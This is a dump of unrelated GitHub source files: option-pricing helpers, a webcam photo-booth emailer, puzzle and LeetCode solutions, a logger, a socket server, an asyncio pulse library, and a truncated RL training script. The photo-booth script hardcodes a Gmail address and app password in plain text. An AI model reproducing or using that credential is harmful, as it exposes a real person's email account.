+{"seq_id":"30919959048","text":"import numpy as np\nfrom scipy.interpolate import InterpolatedUnivariateSpline\nfrom scipy.stats import norm\nfrom scipy.optimize import newton\n\n#CALL\ndef bs_explicit_call(ttm, strike, spot, rate, SIGMA, dividends=0.):\n d1 = (np.log(spot / strike) + (rate - dividends + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n d2 = d1 - SIGMA * np.sqrt(ttm)\n return np.exp(-dividends * ttm) * norm.cdf(d1) * spot - norm.cdf(d2) * strike * np.exp(-rate * ttm)\n\n\ndef bs_call_delta(ttm, strike, spot, rate, SIGMA, dividends=0):\n d1 = (np.log(spot / strike) + (rate + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n return np.exp(-dividends * ttm) * norm.cdf(d1)\n\n\ndef bs_put_delta(ttm, strike, spot, rate, SIGMA, dividends=0):\n d1 = (np.log(spot / strike) + (rate + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n return -np.exp(-dividends * ttm) * norm.cdf(-d1)\n\n\n#PUT\ndef bs_explicit_put(ttm, strike, spot, rate, SIGMA, dividends=0.):\n d1 = (np.log(spot / strike) + (rate - dividends + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n d2 = d1 - SIGMA * np.sqrt(ttm)\n return norm.cdf(-d2) * strike * np.exp(-rate * ttm) - np.exp(-dividends * ttm) * norm.cdf(-d1) * spot\n\n\n\ndef bs_vega(ttm, strike, spot, rate, SIGMA, dividends=0.):\n d1 = (np.log(spot / strike) + (rate + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n return spot * np.exp(-dividends * ttm) * norm.pdf(d1) * np.sqrt(ttm)\n\n\n\n\ndef bs_gamma(ttm, strike, spot, rate, SIGMA, dividends=0):\n assert dividends == 0, \"please implement dividends\"\n d1 = (np.log(spot / strike) + (rate + 0.5 * SIGMA ** 2) * ttm) / (SIGMA * np.sqrt(ttm))\n return norm.pdf(d1) / (spot * SIGMA * np.sqrt(ttm))\n\n\ndef bs_iv(ttm, strike, spot, rate, price, otype='C', dividends=0., x0=0.7):\n\n assert otype.upper() in ('C', 'P'), \"Option type must be 'C' or 'P'\"\n\n def target(sigma):\n return otype.upper() == 'C' \\\n and bs_explicit_call(ttm, strike, spot, rate, sigma, dividends) - price \\\n or bs_explicit_put(ttm, strike, spot, rate, sigma, dividends) - price\n\n try:\n return newton(target, x0=x0)\n except RuntimeError as e:\n return np.nan\n\n\ndef sizeof_fmt(num, suffix='B'):\n\n for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\n\n\n# interpolation options functions\ndef interpolate(fn, model, period, asset):\n\n # interpolation parameters\n n = 200\n a1, a2 = -0.9, 5.\n\n output = np.empty(asset.underlying.paths.shape)\n output[:] = np.nan\n\n for idx, day in enumerate(period.date_range):\n\n dt = asset.maturity - day\n ttm = dt.days / 365\n if ttm <= 0:\n break\n\n x0 = model.parameters(day).to_numpy()\n xs = asset.strike * (1 + np.linspace(a1, a2, n))\n ys = fn(x0, ttm, asset.strike, xs, asset.underlying.rate)\n\n interp = InterpolatedUnivariateSpline(xs, ys, k=1)\n output[:, idx] = interp(asset.underlying.paths[:, idx])\n\n return output\n","repo_name":"YELORFI/Pricing-crypto","sub_path":"Local_lib/useful.py","file_name":"useful.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28649375777","text":"import cv2\r\nfrom PIL import Image, ImageDraw\r\nimport smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email import encoders\r\n\r\n# Initialize the camera\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Capture a frame\r\nret, frame = cap.read()\r\n\r\n# Release the camera\r\ncap.release()\r\n\r\n# Open the captured image\r\nimage = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\r\n\r\n# Load the emoji image\r\nemoji = Image.open('../static/images/lumo.png')\r\n\r\n# Resize the emoji to fit your desired size\r\nemoji = emoji.resize((150, 150))\r\n\r\n# Calculate the position for the left bottom corner\r\nx_position = 20 # Adjust this value for the desired horizontal position\r\ny_position = image.height - emoji.height - 20 # 20 pixels from the bottom, adjust as needed\r\n\r\n# Paste the emoji onto the captured image\r\nimage.paste(emoji, (x_position, y_position), emoji)\r\n\r\n# Save the modified image\r\noutput_image_path = \"../static/images/output_image.png\"\r\nimage.save(output_image_path)\r\n\r\n# Send the modified image via email\r\nfrom_email = \"vemulashivani2012@gmail.com\"\r\nfrom_password = \"qlww rkwk waze aycs\"\r\n# user_mail=input(\"Enter your mail id\") get user name from request parameters\r\nto_email = \"\"\r\n\r\n# Create a MIME object\r\nmsg = MIMEMultipart()\r\nmsg['From'] = from_email\r\nmsg['To'] = to_email\r\nmsg['Subject'] = \"Image with LUMOS LOGO\"\r\n\r\n# Attach the modified image\r\nwith open(output_image_path, 'rb') as attachment:\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload(attachment.read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', f\"attachment; filename= {output_image_path}\")\r\n msg.attach(part)\r\n\r\n# Connect to Gmail's SMTP server and send the email\r\ntry:\r\n # Connect to Gmail's SMTP server and send the email\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.login(from_email, from_password)\r\n server.sendmail(from_email, user_mail, msg.as_string())\r\n server.quit()\r\n print(\"Email sent successfully to:\", user_mail)\r\nexcept Exception as e:\r\n print(\"Email could not be sent:\", str(e))","repo_name":"maxnsi/hsbc-bot","sub_path":"HSBC_Bot/HSBC_Bot_Server/photo_booth.py","file_name":"photo_booth.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7458556459","text":"from itertools import combinations\nfrom functools import reduce\nimport regex as re\n\ndef read_file(file):\n with open(file) as f:\n tiles = f.read().split(\"\\n\\n\")\n tiles = [tile.splitlines() for tile in tiles if tile != '']\n tile_ids = [tile[0][tile[0].index(\" \") + 1:tile[0].index(\":\")] for tile in tiles]\n tile_imgs = [tile[1:] for tile in tiles]\n \n return dict(zip(tile_ids, tile_imgs))\n\n# t, b, l, r, tr, br, lr, rr\ndef get_border(tile_img):\n border = []\n border = border + [tile_img[0]] + [tile_img[-1]]\n tile_flip = list(zip(*tile_img))\n border = border + [\"\".join(tile_flip[0])] + [\"\".join(tile_flip[-1])]\n \n border += [\"\".join(reversed(b)) for b in border]\n \n return border\n \n\n\ntiles = read_file(\"input/20_input.txt\")\n\ntile_borders = {}\nfor k, v in tiles.items():\n tile_borders[k] = get_border(v)\n\n\ndef get_share_borders(tiles, tile_borders):\n new_tiles = tiles.copy()\n id_combs = combinations(new_tiles.keys(), 2)\n share_edges = {}\n for comb in id_combs:\n share_edges[comb] = set(tile_borders[comb[0]]).intersection(set(tile_borders[comb[1]]))\n share_edges = {k: v for k, v in share_edges.items() if v} \n ids = [id for k in share_edges.keys() for id in k]\n share_count = {x:ids.count(x) for x in set(ids)}\n \n # corners have two adjacents\n corner = {k: v for k, v in share_count.items() if v == 2}\n \n return share_edges, corner\n\ndef part1():\n _, corner = get_share_borders(tiles, tile_borders)\n c = 1\n for k in corner.keys():\n c = c * int(k)\n \n return c\n\n# 18482479935793\npart1()\n\n\n## part 2\n\n# rotate or flip the tile\ndef transformers(tile):\n trans = [list(tile), list(tile[::-1])]\n trans = trans + [[line[::-1] for line in tran] for tran in trans]\n trans = trans + [[\"\".join(line) for line in zip(*tran)] for tran in trans]\n \n return trans\n \n\ndef get_adj_id(tile_id, share_edges):\n adj_ids = [i for k, v in share_edges.items() if tile_id in k for i in k if i != tile_id]\n return adj_ids\n \ndef init_tiles(left = '3229', tiles = tiles):\n new_tiles = []\n remain_tiles = tiles.copy()\n init_trans = transformers(tiles[left])\n break_flag = False\n adj_ids = get_adj_id(left, share_edges)\n \n for l_tran in init_trans:\n right_border = get_border(l_tran)[3]\n for adj in adj_ids:\n right_trans = transformers(tiles[adj])\n for r_tran in right_trans:\n left_border = get_border(r_tran)[2]\n if left_border == right_border:\n new_tiles.append((left, l_tran))\n new_tiles.append((adj, r_tran))\n remain_tiles.pop(left)\n remain_tiles.pop(adj)\n right_adj = adj\n break_flag = True\n break\n if break_flag:\n break\n if break_flag:\n break\n \n \n # the direction of the other adj\n other_adj = list(set(adj_ids).difference(set(right_adj)))[0]\n borders = get_border([t[1] for t in new_tiles if t[0] == left][0])\n \n # if top border in the adj, the direction is up, which means new_tiles is \n # the last row tiles\n top_bd = borders[0]\n if top_bd in get_border(tiles[other_adj]):\n direction = \"up\"\n \n return new_tiles, direction, remain_tiles\n \n\ndef get_row_tiles(curr_tiles, tiles, n_row = 12, share_edges = share_edges):\n row_tiles = curr_tiles.copy()\n remain_tiles = tiles.copy()\n # n_row = int(len(tiles) ** 0.5)\n \n while len(row_tiles) < n_row:\n curr_tile = row_tiles[-1]\n right_border = get_border(curr_tile[1])[3]\n adj_ids = get_adj_id(curr_tile[0], share_edges)\n # remove the tiles have been positioned\n adj_ids = [i for i in adj_ids if i in remain_tiles.keys()]\n \n break_flag = False\n for adj in 
adj_ids:\n right_trans = transformers(remain_tiles[adj])\n for r_tran in right_trans:\n left_border = get_border(r_tran)[2]\n if left_border == right_border:\n row_tiles.append((adj, r_tran))\n remain_tiles.pop(adj)\n break_flag = True\n break\n if break_flag:\n break\n \n return row_tiles, remain_tiles\n \n\ndef get_next_row_tiles(row_tiles, direction, tiles, share_edges):\n remain_tiles = tiles.copy()\n # row_ids = [term[0] for term in row_tiles]\n # remain_tiles = {k: v for k, v in remain_tiles.items() if k not in row_ids}\n \n curr_row_tiles = row_tiles.copy()\n next_row_tiles = []\n \n for tile in curr_row_tiles:\n adj_ids = get_adj_id(tile[0], share_edges)\n \n # should be length one \n adj_id = [i for i in adj_ids if i in remain_tiles.keys()]\n if len(adj_id) == 1:\n AssertionError(\"adj_id must be length one\")\n next_tile = tiles[adj_id[0]]\n \n curr_borders = get_border(tile[1])\n if direction == \"up\":\n bd = curr_borders[0]\n elif direction == \"down\":\n bd = curr_borders[1]\n else:\n AssertionError(\"direction must be up or down\")\n \n next_tile_trans = transformers(next_tile)\n \n for t in next_tile_trans:\n next_bds = get_border(t)\n if direction == \"up\":\n next_bd = next_bds[1]\n else:\n next_bd = next_bds[0]\n if next_bd == bd:\n next_row_tiles.append((adj_id[0], t))\n remain_tiles.pop(adj_id[0])\n break\n \n \n return next_row_tiles, remain_tiles\n \n\ndef get_all_tiles(curr_row_tiles, tiles, share_edges, direction = \"up\", n_col = 12):\n all_tiles = [curr_row_tiles]\n remain_tiles = tiles.copy()\n \n while len(all_tiles) < n_col:\n curr_row_tiles, remain_tiles = get_next_row_tiles(\n curr_row_tiles, \n direction, \n remain_tiles, \n share_edges)\n all_tiles = [curr_row_tiles] + all_tiles\n \n return all_tiles\n\n\ndef remove_border(tile):\n new_tile = tile.copy()\n # remove the first and last element\n del new_tile[-1]\n del new_tile[0]\n \n # remove the first and last elment of each element\n return [line[1:-1] for line in new_tile]\n\ndef merge_tiles_in_row(tile1, tile2):\n res = []\n for i in range(len(tile1)):\n res.append(\"\".join([tile1[i], tile2[i]]))\n \n return res\n \ndef merge_rows(row_tiles):\n return reduce(merge_tiles_in_row, row_tiles)\n \ndef merge_tiles(all_tiles):\n res = []\n for t in all_tiles:\n res = res + merge_rows(t)\n \n return res\n \ndef find_monster(img, pattern):\n img_trans = transformers(img)\n # the python internal re.findall return all non-overlapping matches of pattern in string\n # use regex.findall instead\n trans_flatten = [reduce(lambda x, y: \"\\n\".join([x, y]), t) for t in img_trans] \n for t in trans_flatten:\n monsters = re.findall(pattern, t, overlapped=True)\n if monsters:\n break\n \n return monsters\n \n \nshare_edges, corner = get_share_borders(tiles, tile_borders)\ncurr_tiles, direction, remain_tiles = init_tiles()\nrow_tiles, remain_tiles = get_row_tiles(curr_tiles, remain_tiles)\n# next_row_tiles, remain_tiles = get_next_row_tiles(row_tiles, direction, tiles, share_edges)\nall_tiles = get_all_tiles(row_tiles, remain_tiles, share_edges)\n\nall_tiles_corrected = [[remove_border(t[1]) for t in row] for row in all_tiles]\ntiles_final = merge_tiles(all_tiles_corrected)\n\n# tiles_final_trans = transformers(tiles_final)\n# trans_flattened = [reduce(lambda x, y: \"\\n\".join([x, y]), t) for t in tiles_final_trans]\n# pattern = re.compile(r'#.{77}#.{4}##.{4}##.{4}###.{77}(?:#.{2}){6}')\npattern = 
re.compile(r\"(?:[.#]){18}#[.#](?:.|\\n){77}#(?:[.#]){4}##(?:[.#]){4}##(?:[.#]){4}###(?:.|\\n){77}[.#](?:#(?:[.#]){2}){5}#(?:[.#]){3}\")\n\nmonster = ''' # \n# ## ## ###\n # # # # # # '''\n \nmonsters = find_monster(tiles_final, pattern)\npart2_res = sum([t.count(\"#\") for t in tiles_final]) - len(monsters) * monster.count(\"#\")\nprint(part2_res)\n\n###================================ test\n\ntest_image = '''.#.#..#.##...#.##..#####\n###....#.#....#..#......\n##.##.###.#.#..######...\n###.#####...#.#####.#..#\n##.#....#.##.####...#.##\n...########.#....#####.#\n....#..#...##..#.#.###..\n.####...#..#.....#......\n#..#.##..#..###.#.##....\n#.####..#.####.#.#.###..\n###.#.#...#.######.#..##\n#.####....##..########.#\n##..##.#...#...#.#.#.#..\n...#..#..#.#.##..###.###\n.#.#....#.##.#...###.##.\n###.#...#..#.##.######..\n.#.#.###.##.##.#..#.##..\n.####.###.#...###.#..#.#\n..#.#..#..#.#.#.####.###\n#..####...#.#.#.###.###.\n#####..#####...###....##\n#.##..#..#...#..####...#\n.#.###..##..##..####.##.\n...###...##...#...#..###\n'''.splitlines()","repo_name":"yiluheihei/AdventOfCode","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13922091148","text":"from datetime import datetime\nimport inspect\nfrom flask import session\n\nfrom apps.proc import constants\n\n\nclass Logger(object):\n def __init__(self, filename):\n self.filename = filename\n\n def _write_log(self, level, msg):\n flat_msg = '<'+msg[0]+'> '\n\n if len(msg) > 1:\n for elem in msg[1:]:\n if type(elem) == str:\n flat_msg += elem + ' '\n else:\n flat_msg += str(elem) + ' '\n mess = \"{0} [{1}] {2}\".format(datetime.now().strftime('%m-%d-%y %H:%M:%S'), level, flat_msg)\n if level == 'ERROR':\n print(constants.bcolors.FAIL + mess + constants.bcolors.ENDC)\n elif level == 'WARN':\n print(constants.bcolors.WARNING + mess + constants.bcolors.ENDC)\n elif level == 'INFO':\n print(constants.bcolors.OKGREEN + mess + constants.bcolors.ENDC)\n elif level.startswith('DEBUG'):\n print(constants.bcolors.OKBLUE + mess + constants.bcolors.ENDC)\n else:\n print(mess)\n with open(self.filename, 'a', encoding='utf-8') as log_file:\n log_file.write(mess + '\\n')\n\n\n def critical(self, *msg):\n self._write_log('CRITICAL', msg)\n\n def error(self, *msg):\n self._write_log(\"ERROR\", msg)\n\n def warn(self, *msg):\n self._write_log(\"WARN\", msg)\n\n def info(self, *msg):\n self._write_log(\"INFO\", msg)\n\n def debug(self, *msg):\n self._write_log(\"DEBUG \"+str(inspect.stack()[1].function), msg)\n\n","repo_name":"wieslawseweryn/dash_fastapi_docker","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27361398462","text":"from . import Fonctions\nimport time\n\ndef methodeTrie(motifs, text):\n\tglobal kwtree, temps\n\tdebutTout = time.time()\n\t# Nous créons le trie\n\tkwtree = Fonctions.KeywordTree(case_insensitive=True)\n\t# Nous ajoutons les motifs un par un\n\tfor motif in motifs:\n\t\tkwtree.add(motif)\n\t# On ferme le trie, donc on peut plus ajouter de noeuds\n\t# Et cette fonction ajoute aussi les liens suffixes\n\tkwtree.finalize()\n\t# On cherche les motifs entrès dans le texte\n\tresults = kwtree.search_all(text)\n\n\tfinTout = time.time()\n\n\ttemps = finTout - debutTout\n\treturn results\n\n","repo_name":"choukribouabana/Programmationn","sub_path":"Trie/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42351081829","text":"import typing as t\n\n# 347. Top K Frequent Elements\n\n# https://leetcode.com/problems/top-k-frequent-elements/\n\n\n# Given an integer array nums and an integer k, return the k most frequent elements. You may return the answer in any order.\n\n\n# Example 1:\n# Input: nums = [1,1,1,2,2,3], k = 2\n# Output: [1,2]\n\n# Example 2:\n# Input: nums = [1], k = 1\n# Output: [1]\n\n\ndef top(\n nums: t.List[int],\n k: int,\n):\n count: t.Dict[int, int] = {}\n\n for n in nums:\n count[n] = 1 + count.get(n, 0)\n\n sorted_dict = sorted(\n count.items(),\n key=lambda x: x[1],\n reverse=True,\n )\n\n result = [int(elt[0]) for elt in sorted_dict][:k]\n\n return result\n\n\ndef test_top():\n nums = [1, 1, 1, 2, 2, 3]\n k = 2\n expected = [1, 2]\n\n result = top(\n nums=nums,\n k=k,\n )\n\n assert result == expected\n","repo_name":"richarddevers/leetcode","sub_path":"medium/347-top-k.py","file_name":"347-top-k.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36579154144","text":"\"\"\"\nimport socket\n\nHOST = #'127.0.0.1' # Server IP or Hostname\nPORT = 12345 # Pick an open Port (1000+ recommended), must match the client sport\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint ('Socket created')\n\n#managing error exception\ntry:\n\ts.bind((HOST, PORT))\nexcept socket.error:\n\tprint('Bind failed')\n\ns.listen(5)\nprint('Socket awaiting messages')\n(conn, addr) = s.accept()\nprint('Connected')\n\n# awaiting for message\nwhile True:\n\tdata = conn.recv(1024)\n\tprint('I sent a message back in response to: ') + data\n\treply = ''\n\n\t# process your message\n\tif data == 'Hello':\n\t\treply = 'Hi, back!'\n\telif data == 'This is important':\n\t\treply = 'OK, I have done the important thing you have asked me!'\n\n\t#and so on and on until...\n\telif data == 'quit':\n\t\tconn.send('Terminating')\n\t\tbreak\n\telse:\n\t\treply = 'Unknown command'\n\n\t# Sending reply\n\tconn.send(reply)\n\tconn.close() # Close connections\n\"\"\"\nimport socket \nimport threading\n\nHEADER = 64\nPORT = 5050\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR)\n\ndef handle_client(conn, addr):\n print(f\"[NEW CONNECTION] {addr} connected.\")\n\n connected = True\n while connected:\n msg_length = conn.recv(HEADER).decode(FORMAT)\n if msg_length:\n msg_length = int(msg_length)\n msg = conn.recv(msg_length).decode(FORMAT)\n if msg == DISCONNECT_MESSAGE:\n connected = False\n\n print(f\"[{addr}] {msg}\")\n conn.send(\"Msg received\".encode(FORMAT))\n\n conn.close()\n return False\n \n\ndef start():\n server.listen()\n print(f\"[LISTENING] Server is listening on {SERVER}\")\n while True:\n conn, addr = server.accept()\n #thread = threading.Thread(target=handle_client, args=(conn, addr))\n #thread.start()\n \n if (handle_client(conn, addr)) == False:\n print(f\"[{addr}] Server closed!\")\n break\n #print(f\"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}\")\n\n\nprint(\"[STARTING] server is starting...\")\nstart()\n","repo_name":"thong-nt/Driver-status-estimator-tensorflow","sub_path":"script/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30520405404","text":"from __future__ import annotations\n\nimport time\nimport asyncio\nfrom asyncio import Future\nfrom collections import deque\nfrom datetime import timedelta\nfrom functools import partial\nfrom typing import AsyncIterator, Callable, cast, Coroutine, Generator\n\ntry:\n from typing import ParamSpec\nexcept ImportError:\n from typing_extensions import ParamSpec\n\nfrom .fuse import Fuse\n\n_P = ParamSpec(\"_P\")\n\n\nclass PulseClosed(Exception):\n \"\"\"Raised when a pulse is closed.\"\"\"\n\n\nclass _BasePulse:\n def __init__(self) -> None:\n self._waiters: deque[Future[float]] = deque()\n self._value: float | None = None\n self._loop = asyncio.get_event_loop()\n self._closed = Fuse()\n self._pulse_callbacks: list[Callable[[float], object] | Callable[[], object]] = []\n\n def add_pulse_callback(\n self,\n callback: Callable[_P, object],\n thread_safe: bool = False,\n *__args: _P.args,\n **__kwargs: _P.kwargs,\n ) -> None:\n \"\"\"Add a callback to be called when the pulse is fired.\n\n If it is a coroutine, it will be scheduled as a task; otherwise, it will be scheduled\n via the event loop's call_soon method if thread_safe is False, or via call_soon_threadsafe\n if thread_safe is True.\n \"\"\"\n\n if asyncio.iscoroutinefunction(callback):\n _fn = cast(Callable[_P, Coroutine[object, object, object]], callback)\n\n def _cb() -> None:\n _ = asyncio.create_task(_fn(*__args, **__kwargs))\n\n elif thread_safe:\n\n def _cb() -> None:\n self._loop.call_soon_threadsafe(partial(callback, *__args, **__kwargs))\n\n else:\n\n def _cb() -> None:\n self._loop.call_soon(partial(callback, *__args, **__kwargs))\n\n self._pulse_callbacks.append(_cb)\n\n def _run_callbacks(self) -> None:\n for cb in self._pulse_callbacks:\n self._loop.call_soon(cb)\n\n @property\n def is_closed(self) -> bool:\n \"\"\"Return True if the pulse is closed.\"\"\"\n return self._closed.is_set()\n\n def close(self) -> None:\n \"\"\"Close the pulse, waking up all waiters.\n\n The resulting future will have a PulseClosed exception set as its exception.\n \"\"\"\n self._closed.set()\n for fut in self._waiters:\n fut.set_exception(PulseClosed())\n\n async def wait_closed(self) -> None:\n \"\"\"Wait for the pulse to be closed.\"\"\"\n await self._closed.wait()\n\n def wait(self) -> Future[float]:\n \"\"\"Wait for the pulse to be fired.\n\n Returns a future that will be resolved when the pulse is fired.\n The future's result will be the time at which the pulse was fired, as per time.time().\n \"\"\"\n fut = asyncio.get_event_loop().create_future()\n self._waiters.append(fut)\n return fut\n\n def __await__(self) -> Generator[None, None, float]:\n \"\"\"Wait for the pulse to be fired.\n\n Returns the time at which the pulse was fired, as given by time.time().\n \"\"\"\n return self.wait().__await__()\n\n async def _aiter(self) -> AsyncIterator[float]:\n while True:\n try:\n yield await self\n except PulseClosed:\n break\n\n def __aiter__(self) -> AsyncIterator[float]:\n return self._aiter()\n\n def _fire(self) -> None:\n \"\"\"Fire the pulse, waking up all waiters.\n\n The resulting future will be resolved with the current time.\n \"\"\"\n if self._closed.is_set():\n raise RuntimeError(\"Cannot fire a closed pulse\")\n\n self._value = time.time()\n for fut in self._waiters:\n fut.set_result(self._value)\n self._waiters.clear()\n\n self._run_callbacks()\n\n\nclass Pulse(_BasePulse):\n \"\"\"A pulse that can be triggered and waited for.\n\n Waiting for a pulse will block until the pulse is triggered, and 
will return\n the time at which the pulse was triggered. Alternatively, the pulse can be given\n a function to call when it is triggered. In this case, the return value of waiting\n on the pulse will be the result of calling the function.\n\n The pulse can be closed, which will cause all waiters to be woken up with a\n PulseClosed exception. After the pulse is closed, it cannot be fired again.\n\n The pulse can be used as an async iterator, which will yield the time at which\n the pulse is fired. The iterator will stop yielding when the pulse is closed.\n\n Examples:\n >>> pulse = Pulse()\n >>> pulse.fire()\n >>> await pulse\n 123.456\n\n >>> pulse = Pulse()\n >>> pulse.add_pulse_callback(lambda: print(\"Pulse fired!\"))\n >>> pulse.fire()\n Pulse fired!\n\n >>> pulse = Pulse()\n >>> async def pulse_subscriber(pulse: Pulse) -> None:\n ... async for t in pulse:\n ... print(t)\n >>> asyncio.create_task(pulse_subscriber(pulse))\n >>> pulse.fire()\n 123.456\n >>> pulse.fire()\n 123.457\n >>> pulse.close()\n >>> pulse.fire()\n Traceback (most recent call last):\n ...\n RuntimeError: Cannot fire a closed pulse\n \"\"\"\n\n fire = _BasePulse._fire\n\n\nclass PeriodicPulse(_BasePulse):\n \"\"\"A pulse that fires periodically.\n\n The pulse will fire every `interval` seconds, and will wait for `delay` seconds\n before the first pulse is fired. This can be used to implement a periodic task,\n and is different from asyncio's `loop.call_later` or `while True: await asyncio.sleep(x)`\n in that it will not drift over time.\n\n The pulse can be closed, which will cause all waiters to be woken up with a\n PulseClosed exception. After the pulse is closed, it does not fire again.\n\n The pulse can be used as an async iterator, which will yield the time at which\n the pulse is fired. The iterator will stop yielding when the pulse is closed.\n\n Examples:\n >>> pulse = PeriodicPulse(1.0)\n >>> async for t in pulse:\n ... print(t)\n 123.456\n 124.456\n 125.456\n\n >>> pulse = PeriodicPulse(period=timedelta(minutes=5), start_delay=0.5)\n >>> pulse.add_pulse_callback(lambda: print(f\"Pulse fired! {time.time()}\"))\n >>> await asyncio.sleep(60 * 15)\n Pulse fired! 12:00:00\n Pulse fired! 12:05:00\n Pulse fired! 12:10:00\n \"\"\"\n\n def __init__(\n self,\n period: float | timedelta,\n start_delay: float | timedelta | None = None,\n ) -> None:\n \"\"\"Create a periodic pulse.\n\n Args:\n period: The period of the pulse, in seconds or a timedelta.\n start_delay: The delay before the first pulse is fired. If None, the first pulse\n will be fired after `period` seconds. 
To fire the first pulse immediately,\n pass 0.\n \"\"\"\n super().__init__()\n self._period = period.total_seconds() if isinstance(period, timedelta) else period\n\n self._ticks = 0\n\n if start_delay is None:\n self._start_delay = self._period\n elif isinstance(start_delay, timedelta):\n self._start_delay = start_delay.total_seconds()\n else:\n self._start_delay = start_delay\n\n self._start_time = self._loop.time()\n self._next_tick_handle = self._loop.call_at(\n self._start_time + self._start_delay,\n self._tick,\n )\n self._target_period: float | None = None\n\n def _tick(self) -> None:\n if self._closed.is_set():\n return\n\n self._fire()\n\n if self._target_period is not None:\n self._period = self._target_period\n self._target_period = None\n self._ticks = 0\n self._start_time = self._loop.time()\n self._start_delay = 0\n\n self._ticks += 1\n self._next_tick_handle = self._loop.call_at(\n when=self._start_time + self._period * self._ticks + self._start_delay,\n callback=self._tick,\n )\n\n @property\n def period(self) -> timedelta:\n \"\"\"The period of the pulse.\"\"\"\n return timedelta(seconds=self._period)\n\n @period.setter\n def period(self, period: float | timedelta) -> None:\n self._target_period = period if isinstance(period, float) else period.total_seconds()\n\n\nif __name__ == \"__main__\":\n import time\n\n async def main() -> None:\n pulse = Pulse()\n\n async def show_pulses() -> None:\n async for t in pulse:\n print(f\"pulse1 fired at {t}\")\n print(\"pulse1 finished\")\n\n for _ in range(3):\n asyncio.create_task(show_pulses())\n\n pulse.fire()\n await asyncio.sleep(0.1)\n pulse.fire()\n await asyncio.sleep(0.1)\n pulse.fire()\n await asyncio.sleep(0.3)\n pulse.fire()\n await asyncio.sleep(0.3)\n pulse.close()\n\n time_pulse = PeriodicPulse(0.25)\n\n async def show_time_pulses() -> None:\n # async for t in time_pulse:\n # print(f\"time_pulse fired at {t}\")\n t = await time_pulse\n print(f\"time_pulse fired at {t}\")\n print(\"time_pulse finished\")\n\n for _ in range(3):\n asyncio.create_task(show_time_pulses())\n\n await asyncio.sleep(3)\n\n print(\"awaiting once\", time.time())\n await time_pulse\n print(\"awaiting twice\", time.time())\n await time_pulse\n print(\"awaiting thrice\", time.time())\n await time_pulse\n print(\"awaiting finished\", time.time())\n time_pulse.close()\n\n async def main_test_set_period() -> None:\n t = time.time()\n start_delay = 1 - divmod(t, 1)[1] # start at the next second, for round numbers\n # await asyncio.sleep(start_delay)\n pulse = PeriodicPulse(0.1, start_delay=start_delay)\n start_time = time.time()\n print(f\"start_time: {start_time}; period: {pulse.period}\")\n pulse.add_pulse_callback(\n lambda: print(f\"pulse fired at t+{time.time()-start_time:3.5f}\")\n )\n await asyncio.sleep(1.3)\n print(\"setting period to 0.5\")\n pulse.period = timedelta(seconds=0.5)\n await asyncio.sleep(5)\n pulse.close()\n\n await main_test_set_period()\n\n asyncio.run(main())\n\n\n__all__ = (\"PeriodicPulse\", \"Pulse\", \"PulseClosed\")\n","repo_name":"pedrovhb/asynkets","sub_path":"asynkets/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":10461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73491241153","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport argparse\nimport math\nfrom distutils.version import LooseVersion\nfrom ruamel.yaml import YAML, dump, RoundTripDumper\nimport logging\n\nimport torch\nfrom torch import nn\n\nimport pfrl\nfrom pfrl import utils\n\nfrom rslgym.wrapper import VecEnvPython\nfrom rslgym_wrapper_cart_pole import cart_pole_example_env\nfrom rslgym.wrapper import train_agent_batch_with_evaluation_pfrl\nfrom rslgym.wrapper import eval_performance_pfrl\nfrom rslgym.algorithm.utils import ConfigurationSaver\n\n\ndef main():\n if LooseVersion(torch.__version__) < LooseVersion(\"1.5.0\"):\n raise Exception(\"This script requires a PyTorch version >= 1.5.0\")\n\n # config file arg\n parser = argparse.ArgumentParser()\n parser.add_argument('--cfg_name', type=str, default='/cfg.yaml', help='configuration file')\n parser.add_argument( \"--demo\", action=\"store_true\", help=\"Just run evaluation, not training.\")\n parser.add_argument( \"--demo-record\", action=\"store_true\", help=\"Save video of demo.\")\n 